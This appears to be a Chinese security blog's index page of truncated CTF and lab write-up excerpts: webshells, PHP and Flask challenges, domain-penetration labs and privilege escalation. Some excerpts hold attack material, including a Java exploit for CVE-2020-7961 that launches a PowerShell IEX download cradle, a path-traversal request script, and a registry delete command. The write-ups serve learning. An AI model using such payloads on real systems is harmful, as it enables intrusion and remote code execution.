easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 BlackCat view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3 拉到最底下有源码: ```php if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST...
easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 Bl...
阅读全文>>upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 Funhash ```php <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { ...
upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 ...
阅读全文>>easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...
easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...
阅读全文>>文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。 debug pin 本地先起一个开启debug模式的服务: ```python -- coding: utf-8 -- from flask import Flask app = Flask(name) @app.route("/") def hel...
文章首发于:合天 最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask...
阅读全文>>SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checkin(v1) php <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } v1版本是出题人忘记改...
SU的师傅们太顶了,全程被带飞,贡献度为0 XD 其他的题目环境下了+自己太菜了来不及复现。 web_checki...
阅读全文>>好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。 ```python import time import requests import base64 file = "hhhm/../../../../../../../../flag" file = base64.b64encode(file.encode()) ...
好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么...
阅读全文>>前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段: kali nat win7 vm2,nat win2008 vm2 win2003 vm2 nat为192.168.248.0/24 vm2为192.168.52.0/24 貌似环境问题,win7的靶机需要清理右下角通知区域图标: reg delete "HKEY_CUR...
前言 上回遇到了域渗透题,自己没事找了个红日的靶机来学学域渗透的东西。 红日的域渗透靶机,有三台机,配了两个网段:...
阅读全文>>简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...
简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...
阅读全文>>第一次综合渗透,感觉是个挺好玩的靶机,PHPMailer RCE+Mysql UDF+SUID提权。 初步探测 第一次渗透靶机,细细描述渗透过程。 首先nmap探测主机: root@zhang:/home# nmap -sP 192.168.40.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 23:21 CST Nmap...
第一次综合渗透,感觉是个挺好玩的靶机,PHPMailer RCE+Mysql UDF+SUID提权。 初步探测 第...
阅读全文>>_ _ _ _ ___ ___ | | | | | | | | \/ | | |_| | |__ | |__ | . . | | _ | '_ \| '_ \| |\/| | | | | | | | | | | | | | | \_| |_/_| |_|_| |_\_| |_/